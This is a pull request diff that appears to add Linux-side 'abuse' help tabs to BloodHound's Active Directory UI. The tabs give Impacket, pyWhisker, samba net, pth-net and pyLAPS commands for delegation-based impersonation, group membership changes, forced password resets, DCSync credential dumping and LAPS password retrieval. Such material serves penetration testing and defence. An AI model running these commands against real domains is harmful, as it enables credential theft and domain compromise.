### PR TITLE
Adding abuse guidance from UNIX-like hosts

### DIFF
--- a/src/components/Modals/HelpTexts/AddAllowedToAct/AddAllowedToAct.jsx
+++ b/src/components/Modals/HelpTexts/AddAllowedToAct/AddAllowedToAct.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const AddAllowedToAct = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/AddAllowedToAct/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AddAllowedToAct/LinuxAbuse.jsx
@@ -1,0 +1,42 @@
+import React from 'react';
+
+const LinuxAbuse = () => {
+    return (
+        <>
+            First, if an attacker does not control an account with an
+            SPN set, a new attacker-controlled computer account can be
+            added with Impacket's addcomputer.py example script:
+            <pre>
+                <code>
+                    {
+                        "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                    }
+                </code>
+            </pre>
+            We now need to configure the target object so that the attacker-controlled
+            computer can delegate to it. Impacket's rbcd.py script can be used for that
+            purpose:
+            <pre>
+                <code>
+                    {
+                        "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                    }
+                </code>
+            </pre>
+            And finally we can get a service ticket for the service name (sname) we
+            want to "pretend" to be "admin" for. Impacket's getST.py example script
+            can be used for that purpose.
+            <pre>
+                <code>
+                    {
+                        "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                    }
+                </code>
+            </pre>
+            This ticket can then be used with Pass-the-Ticket, and could grant access
+            to the file system of the TARGETCOMPUTER.
+        </>
+    );
+};
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/AddAllowedToAct/References.jsx
+++ b/src/components/Modals/HelpTexts/AddAllowedToAct/References.jsx
@@ -26,6 +26,14 @@ const References = () => {
             <a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
                 https://github.com/Kevin-Robertson/Powermad#new-machineaccount
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota'>
+                https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/AddAllowedToAct/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AddAllowedToAct/WindowsAbuse.jsx
@@ -1,6 +1,6 @@
 import React from 'react';
 
-const Abuse = () => {
+const WindowsAbuse = () => {
     return (
         <>
             Abusing this primitive is currently only possible through the Rubeus
@@ -62,4 +62,4 @@ const Abuse = () => {
     );
 };
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/AddKeyCredentialLink/AddKeyCredentialLink.jsx
+++ b/src/components/Modals/HelpTexts/AddKeyCredentialLink/AddKeyCredentialLink.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const AddKeyCredentialLink = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx
@@ -4,11 +4,7 @@ import PropTypes from 'prop-types';
 const LinuxAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
-            <p>To abuse this privilege, use
-                <a href='https://github.com/ShutdownRepo/pywhisker'>
-                    pyWhisker
-                </a>
-            .</p>
+            <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
 
             <pre>
                 <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>

--- a/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx
@@ -1,0 +1,29 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>To abuse this privilege, use
+                <a href='https://github.com/ShutdownRepo/pywhisker'>
+                    pyWhisker
+                </a>
+            .</p>
+
+            <pre>
+                <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+            </pre>
+
+            <p>
+                For other optional parameters, view the pyWhisker documentation.
+            </p>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+};
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/AddKeyCredentialLink/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AddKeyCredentialLink/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>To abuse this privilege, use Whisker. </p>
@@ -18,15 +18,15 @@ const Abuse = ({ sourceName, sourceType }) => {
             </pre>
 
             <p>
-                For other optional parameters, view the Whisper documentation.
+                For other optional parameters, view the Whisker documentation.
             </p>
         </>
     );
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/AddMember/AddMember.jsx
+++ b/src/components/Modals/HelpTexts/AddMember/AddMember.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const AddMember = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
@@ -18,10 +18,8 @@ const LinuxAbuse = ({ sourceName, sourceType }) => {
             </pre>
 
             <p>
-                Pass-the-hash can also be done here with
-                <a href='https://github.com/byt3bl33d3r/pth-toolkit'>
-                    pth-toolkit's net tool
-                </a>. If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
             </p>
 
             <pre>

--- a/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
@@ -1,0 +1,55 @@
+import React from 'react';
+import PropTypes from "prop-types";
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>
+                Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                or prompted interactively if omitted from the command line:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Pass-the-hash can also be done here with
+                <a href='https://github.com/byt3bl33d3r/pth-toolkit'>
+                    pth-toolkit's net tool
+                </a>. If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Finally, verify that the user was successfully added to the group:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes= {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string
+}
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/AddMember/References.jsx
+++ b/src/components/Modals/HelpTexts/AddMember/References.jsx
@@ -14,6 +14,10 @@ const References = () => {
             <a href='https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728'>
                 https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/addmember'>
+                https://www.thehacker.recipes/ad/movement/dacl/addmember
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/AddMember/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AddMember/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from "prop-types";
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>
@@ -66,9 +66,9 @@ const Abuse = ({ sourceName, sourceType }) => {
     );
 };
 
-Abuse.propTypes= {
+WindowsAbuse.propTypes= {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string
 }
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/AddSelf/AddSelf.jsx
+++ b/src/components/Modals/HelpTexts/AddSelf/AddSelf.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const AddSelf = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/AddSelf/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AddSelf/LinuxAbuse.jsx
@@ -1,0 +1,53 @@
+import React from 'react';
+import PropTypes from "prop-types";
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>
+                Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                or prompted interactively if omitted from the command line:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Finally, verify that the user was successfully added to the group:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes= {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string
+}
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/AddSelf/References.jsx
+++ b/src/components/Modals/HelpTexts/AddSelf/References.jsx
@@ -14,6 +14,14 @@ const References = () => {
             <a href='https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728'>
                 https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/addmember'>
+                https://www.thehacker.recipes/ad/movement/dacl/addmember
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl#bloodhound-edges'>
+                https://www.thehacker.recipes/ad/movement/dacl#bloodhound-edges
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/AddSelf/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AddSelf/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>
@@ -66,9 +66,9 @@ const Abuse = ({ sourceName, sourceType }) => {
     );
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/AdminTo/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/AdminTo/Abuse.jsx
@@ -12,7 +12,10 @@ const Abuse = () => {
                 Invoke-SMBExec. With Metasploit, consider the modules
                 "exploit/windows/smb/psexec",
                 "exploit/windows/winrm/winrm_script_exec", and
-                "exploit/windows/local/ps_wmi_exec". Additionally, there are
+                "exploit/windows/local/ps_wmi_exec".
+                With Impacket, consider the example scripts
+                psexec/wmiexec/smbexec/atexec/dcomexec. There are other alternatives
+                like evil-winrm and crackmapexec. Additionally, there are
                 several manual methods for remotely executing code on the
                 machine, including via RDP, with the service control binary and
                 interaction with the remote machine's service control manager,

--- a/src/components/Modals/HelpTexts/AllExtendedRights/AllExtendedRights.jsx
+++ b/src/components/Modals/HelpTexts/AllExtendedRights/AllExtendedRights.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -23,8 +24,8 @@ const AllExtendedRights = ({
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse
                     sourceName={sourceName}
                     sourceType={sourceType}
                     targetName={targetName}
@@ -32,10 +33,19 @@ const AllExtendedRights = ({
                     haslaps={haslaps}
                 />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse
+                    sourceName={sourceName}
+                    sourceType={sourceType}
+                    targetName={targetName}
+                    targetType={targetType}
+                    haslaps={haslaps}
+                />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
@@ -1,0 +1,133 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps }) => {
+    switch (targetType) {
+        case 'User':
+            return (
+                <>
+                    <p>
+                        The AllExtendedRights privilege grants {sourceName} the
+                        ability to change the password of the user {targetName}{' '}
+                        without knowing their current password. This is
+                        equivalent to the "ForceChangePassword" edge in
+                        BloodHound.
+                    </p>
+
+                    <p>
+                        Use samba's net tool to change the user's password. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line. The new password will be prompted
+                        if omitted from the command line.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'Computer':
+            if (haslaps)
+                return (
+                    <>
+                        <p>
+                            The AllExtendedRights privilege grants {sourceName} the
+                            ability to obtain the RID 500 administrator password of{' '}
+                            {targetName}. {sourceName} can do so by listing a
+                            computer object's AD properties with PowerView using
+                            Get-DomainComputer {targetName}. The value of the
+                            ms-mcs-AdmPwd property will contain password of the
+                            administrative local account on {targetName}.
+                        </p>
+
+                        <p>
+                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                             to retrieve LAPS passwords:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            </code>
+                        </pre>
+                    </>
+                );
+            else
+                return (
+                    <p>
+                        This ACE is not exploitable under current conditions.
+                        Please report this bug to the BloodHound developers
+                    </p>
+                );
+        case 'Domain':
+            return (
+                <>
+                    <p>
+                        The AllExtendedRights privilege grants {sourceName} both the
+                        DS-Replication-Get-Changes and
+                        DS-Replication-Get-Changes-All privileges, which combined
+                        allow a principal to replicate objects from the domain{' '}
+                        {targetName}.
+                    </p>
+
+                    <p>
+                        This can be abused using Impacket's secretsdump.py example script:
+                    </p>
+
+                    <pre>
+                            <code>
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            </code>
+                    </pre>
+
+                    <p>
+                        The AllExtendedRights privilege also grants {sourceName} enough{' '}
+                        privileges, to retrieve LAPS passwords domain-wise.
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                         for that purpose:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+    }
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+    targetName: PropTypes.string,
+    targetType: PropTypes.string,
+    haslaps: PropTypes.bool
+}
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
@@ -57,14 +57,14 @@ const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps })
                         </p>
 
                         <p>
-                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                            <a href='https://github.com/p0dalirius/pyLAPS'>pyLAPS</a> can be used
                              to retrieve LAPS passwords:
                         </p>
 
                         <pre>
                             <code>
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             </code>
                         </pre>
@@ -110,14 +110,14 @@ const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps })
                     </p>
 
                     <p>
-                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                        <a href="https://github.com/p0dalirius/pyLAPS">pyLAPS</a> can be used
                          for that purpose:
                     </p>
 
                     <pre>
                         <code>
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         </code>
                     </pre>

--- a/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
@@ -80,6 +80,8 @@ const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps })
         case 'Domain':
             return (
                 <>
+                    <h4> DCSync </h4>
+
                     <p>
                         The AllExtendedRights privilege grants {sourceName} both the
                         DS-Replication-Get-Changes and
@@ -99,6 +101,8 @@ const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps })
                                 }
                             </code>
                     </pre>
+
+                    <h4> Retrieve LAPS Passwords </h4>
 
                     <p>
                         The AllExtendedRights privilege also grants {sourceName} enough{' '}

--- a/src/components/Modals/HelpTexts/AllExtendedRights/References.jsx
+++ b/src/components/Modals/HelpTexts/AllExtendedRights/References.jsx
@@ -10,6 +10,22 @@ const References = () => {
             <a href='https://www.youtube.com/watch?v=z8thoG7gPd0'>
                 https://www.youtube.com/watch?v=z8thoG7gPd0
             </a>
+            <br />
+            <a href='https://www.youtube.com/watch?v=z8thoG7gPd0'>
+                https://www.youtube.com/watch?v=z8thoG7gPd0
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/readlapspassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/readlapspassword
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/AllExtendedRights/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AllExtendedRights/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType, targetName, targetType, haslaps }) => {
+const WindowsAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps }) => {
     switch (targetType) {
         case 'User':
             return (
@@ -122,7 +122,7 @@ const Abuse = ({ sourceName, sourceType, targetName, targetType, haslaps }) => {
     }
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
     targetName: PropTypes.string,
@@ -130,4 +130,4 @@ Abuse.propTypes = {
     haslaps: PropTypes.bool
 }
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/AllowedToAct/AllowedToAct.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToAct/AllowedToAct.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const AllowedToAct = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx
@@ -4,16 +4,6 @@ import PropTypes from 'prop-types';
 const LinuxAbuse = ({ sourceName }) => {
     return (
         <>
-            First, if an attacker does not control an account with an
-            SPN set, a new attacker-controlled computer account can be
-            added with Impacket's addcomputer.py example script:
-            <pre>
-                <code>
-                    {
-                        "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
-                    }
-                </code>
-            </pre>
             We can then get a service ticket for the service name (sname) we
             want to "pretend" to be "admin" for. Impacket's getST.py example script
             can be used for that purpose.

--- a/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx
@@ -1,0 +1,37 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName }) => {
+    return (
+        <>
+            First, if an attacker does not control an account with an
+            SPN set, a new attacker-controlled computer account can be
+            added with Impacket's addcomputer.py example script:
+            <pre>
+                <code>
+                    {
+                        "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                    }
+                </code>
+            </pre>
+            We can then get a service ticket for the service name (sname) we
+            want to "pretend" to be "admin" for. Impacket's getST.py example script
+            can be used for that purpose.
+            <pre>
+                <code>
+                    {
+                        "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                    }
+                </code>
+            </pre>
+            This ticket can then be used with Pass-the-Ticket, and could grant access
+            to the file system of the TARGETCOMPUTER.
+        </>
+    );
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+};
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/AllowedToAct/References.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToAct/References.jsx
@@ -26,6 +26,14 @@ const References = () => {
             <a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
                 https://github.com/Kevin-Robertson/Powermad#new-machineaccount
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota'>
+                https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/AllowedToAct/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToAct/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName }) => {
+const WindowsAbuse = ({ sourceName }) => {
     return (
         <>
             <p>
@@ -38,8 +38,8 @@ const Abuse = ({ sourceName }) => {
     );
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
 };
 
-export default Abuse;
